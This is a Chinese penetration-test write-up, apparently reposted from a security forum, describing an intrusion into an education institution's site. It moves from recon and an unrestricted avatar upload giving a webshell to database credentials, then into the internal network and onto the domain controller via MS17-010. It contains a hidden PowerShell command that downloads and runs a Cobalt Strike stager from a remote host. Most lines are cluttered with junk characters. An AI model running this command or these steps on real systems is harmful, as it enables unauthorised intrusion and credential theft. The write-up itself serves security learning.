4 L0 j2 }3 D. b0 L$ [+ _$ N D1 C 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路4 @( _, Y" d/ X; x2 G/ K% f; {' h
! |, g( z# E' f5 t8 z6 q A
: c q; R# D0 \/ Z( z
1 w4 A. Q) S, E- h1 C! S
- v D* v: j' g- \% ?- g6 W$ O/ A: k- O+ i$ @
正文9 H8 q8 x3 @/ F. }3 J9 \
+ r( u4 Y. J5 O, {$ p) p$ h
0 m0 R% q4 n9 _) e- Z; S* l5 z
7 l2 d2 d* G+ }& r + y5 d9 ]5 D5 V( a' l: r( P
# u( w& G, m" r* } S" u 目标:www.xxxx.com(一家教育机构)
) ?. R8 o4 C9 Y打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能, y- ^- r/ _# l% P8 U; y
2 D0 R' u5 ]/ i5 f2 u$ l+ \# L. D2 j
5 Q# d/ F f- O. ]) t+ O
7 o. p6 G" \& i% d6 |% h5 w$ D. P& | 5 T5 N( f3 H/ c" ?, ?
! W( O4 t6 ~/ Y7 Y; A! K h
进行了简单的信息搜集 ; O: P0 P( p+ m$ E0 u3 @4 K3 P% p& b
1 C- f) ]: _6 K0 Q r6 X* J2 L! [3 H1 C0 N3 C, y. ~1 M
. X" L& d8 o. V8 y. g: f$ e
% q+ y5 e1 X$ t/ f- q9 O1 ]4 _9 h8 a 子域名搜集
, t0 U% ?+ `# @3 o
5 |4 |/ n$ @( D: U# i
# I- b$ x) s; b( r& e( O0 w 2 e2 G% m- Q W: z5 b
1 T$ M$ i O/ F+ `; M" p
1 [# |/ m, o* T0 D fofa找资产 / Q+ C; \# X+ O8 E' m
& E! {! x6 i. G5 }' E
; Y0 \& B" w4 C( c# S1 V
* `6 {8 e4 L Z8 `* Y: U: G
- q* L5 ^8 O# m( \' t
4 ~& H4 d! ^) c* A0 W; W/ t& i 2 h$ \: I: E, q
, w! }4 V5 |& Z8 Y: M& A5 R
一共七个资产。去重之后只有两个。 ; w# G$ w( v0 ?$ C# r& b5 S
. G ]9 U1 S H- y
- R5 \* o4 d! v( l" F! Y* ^
$ F+ j2 m) g' i
( @/ y" _1 n" d$ w! s 目录探测% {' Z2 k* \" w# _4 [
( A- b% H. f L8 u* u
% k. b; I; O- s8 m% H$ Y8 i$ H: G. h
& Y: f% T" v' n9 D
: [, ?. d' N' l+ \. T" @
& V- |6 f d/ l. U* @( M# {6 n' E+ s 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 |- v1 T h/ w- k; r7 T / L( j, v. k/ t% j' ?9 k$ [
3 d6 K- a6 a8 j" H" t
8 U! G: a2 r- n$ a
3 W& R& _8 W* y 我又尝试了通过修改返回包来绕过登录界面
1 T9 \8 M9 C; T; F. q 7 H$ @8 J) F' ^& A. f& v; g% _
6 L r+ u7 P; h) J8 b! U! F# j& s
' N+ m( z; d5 M
) f F( z- W6 U+ v) M$ {6 A2 z) x6 U) t2 L4 A% R% g
还是不行,尝试注入无果
* e9 a, \3 w# Z, v# |& T. i0 s2 H# m 9 }) F: z$ M5 K8 s$ Y1 Y3 O! H
" E9 }9 z6 C+ t$ I' ]' [2 b9 U
% m5 m8 Y3 K* J% m; ?- [
1 f. ^4 b$ E' H/ t/ C4 O
0 J/ O; k2 S- |% W! {: C 不过我目录探测出了一处Spring信息泄露
. Y c+ G8 L% g; y7 _$ O ; J$ I5 f7 _3 `
9 G0 q& Q/ W' z0 }3 v0 [0 W
! r9 `2 H6 Q' |
6 [' ]) w$ U( ^% W0 h% Q 2 K4 B3 p3 u3 [' X
* T3 I7 ^' O( V* w
/ y% @* B$ V8 W$ E% ~. P. `
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录4 Q9 D; Z Z' R- E4 b# _
. `/ h- g- ]+ T) {0 ] q I
# n7 A, g! [1 F1 ?- j# i
- k0 O/ H" ?% |( N1 j0 \3 _
: O- }( q$ n2 k' M7 X* F, W& {. @* G w: ?
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 v, t1 x( y4 C2 B6 [" I
5 o/ I* ]+ t. ^
* h# x/ Y4 {% g8 l7 x0 P
8 k! o& P! \8 q' ~6 _+ _2 T
% {, p; M, r" C$ J4 i+ r; |
% ^9 H. |$ H+ }4 p4 O 获取有些师傅到这一步就手机抓包电脑测了。
7 a; T: `2 u/ |3 L
: {8 ~: M$ k* C9 I, Q+ G9 K8 F# i$ C9 O: N( i
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
( T7 v, ]( P# A. b6 P' ?/ N
4 s" C V2 R, m, u4 }, Q8 z/ [' C9 M3 f/ ^3 z' K
其中在一个公众号发现了小程序,可以进行注册。
6 j% m* m- ]' H4 ?. E+ m
5 K, S. H. \5 B/ @/ |8 N) n& } R) z9 Z; u6 ^' |$ }! X3 L' r* Q( s) b' c
看到了头像上传,尝试上传获取WebShell4 [$ N+ [ {, N4 Z
9 a5 X' l# l; P8 \0 Z }6 B" d, a, ~& R1 L& C
; o7 }; }7 n. k2 g / h' {, C7 s7 x, ?5 x# z- d* K' l. n( E
3 ]5 }/ a- D6 z5 i7 a0 W5 o* o 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问$ z' f( L: }! H7 n: O! V
2 [! `4 Y1 Z. W" z& v# _% k) Q! g4 K$ W7 s, d: G$ |
& D& z- @4 Z+ X5 u# K) V, u $ D4 K3 V$ ?3 O3 _ |
) ~2 |1 R! y/ ~+ I+ m8 x' E) O
然后上了大马
: o# I- m, Z. T9 c9 I* [) T( q 6 l8 [- b/ p% G$ i+ @* b6 Q2 h8 {, K
' s0 D4 c2 @. H* _$ S5 l' s1 E5 `
# {7 F! c2 u; O, G 5 e& d2 Y: L F! D Q
* J* I* t! m/ O. U
) Y/ Q, {' @! u$ J* n% ~& i
0 k+ ^% `2 \6 F% q' ?: d3 j0 \% h7 V) V" `
通过翻找文件发现数据库账号密码
" K: I5 C0 `& s) c 6 F8 H* m8 Z* I' j% Y, @
: u; v4 n7 Z' L# p% o) e# M0 c
- Z* E$ z7 m2 X9 D& s% {# T1 x
+ \: L" y# t1 P+ G
1 @$ p) K, @$ c' j; [
--内网渗透
2 @/ D8 ^. j2 L5 O! W5 z 3 N& ?6 T. Z/ e7 c
7 h7 `" n8 k4 r! I 直接通过powershell执行 cs上线+ d I3 o _ H) B
; A8 T$ {5 L% z8 C* w
1 m+ [3 b- V: L/ ~' v+ R powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"8 W, n7 t! Y: B" T. p
3 N& o% w2 h! o: q, q8 P
# q/ } l9 W, {& n
* d) h% g" S+ g) c8 t+ t3 i
5 t- z4 y/ f, i. N! c1 K7 ?* S4 u7 D6 H+ E s
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破: j I1 n$ i+ Q! Y) `8 S: k, T, s
3 V U5 l% B9 j( m+ Y5 f0 H/ t5 o2 `" d+ t) h$ c
( D- v% H( O2 i5 k* E1 Z% h8 Q. D
7 \" }- T- j. l& e# ` Y
( s, l1 { x6 G6 V7 o- s( K 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 3 J2 U! E# T; [5 n) z N
2 ~8 e2 |( n+ Q' |" J! q1 d" T : |: e$ k8 P* r" J& G+ O* Y" ~' F
+ j' {) W) y J4 B8 ]
9 O$ A' A; y @' F
. b0 \$ r6 R g6 u' _0 Y6 \5 E
# n/ F% d8 F7 Q; o( f8 T; g1 C% F 5 Q% Q; P% c6 `* I
D G, r3 o7 ?9 ?! L( q. N$ |8 L
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
- v! ^$ y" B# y6 [6 F( r
2 T0 P! J d, d
/ w: h; y% z3 L! u8 q' b , F) W0 J+ q$ D2 {
* N0 A& ^% M, y, t p, `* m& G # | n# b* Q/ n E; `& M
$ Y9 |1 D: ^+ v4 M! E# U, g& v9 ]
# y# }4 Y; h+ e! ~5 S& L" U
' |) e5 y; R8 }
1 J$ h8 K8 V+ a) E* e! c
2 R" y& O _& g* }% x) w 9 M4 m* G- q9 F; Z- c) F( u. _5 y
6 C% U! b9 |- k
* A8 P3 c n' |# H) \# B
, C, J+ S5 J0 g5 E! y
4 ?$ C4 U% N, W9 E
小结3 e# P6 H, z6 H+ B8 p$ g
y- ^+ X, ?* L7 s( [7 [
c% T# a( `7 B& E, T ' y7 c% O7 M) h- c
* h( N* Z% `* }# G3 i' ?; a( e/ A }- e+ a
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!- G8 K5 H( i4 {$ k$ h
; }1 W7 |1 ?. R: _6 K
5 @% @& S9 }. {; E4 O4 n% C
* m( r- T' G: ]+ j
3 B6 x) x& |/ l: Z8 B
2 B5 ?/ Q: j, h: M9 T0 T( ] -
: G. A# D D( M/ U
. l/ q, O* ~# y% @% q# B
* n# u- L! S* ~. Y: ~( H9 m7 @
- 0 _9 ~1 z! @/ J
8 `( F+ ?% h: m/ j
( d7 A. ?, E+ E3 J% ]& k) S c/ Y T$ f7 c' I
) k F. k8 B5 i" l; c/ T; L4 n* U 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
! m; x# _5 G' w9 v1 e* h
' P5 v6 p( p+ u, q6 D
$ g: \9 }! G8 O7 ^
! l! z( J! V9 a$ S/ U* T |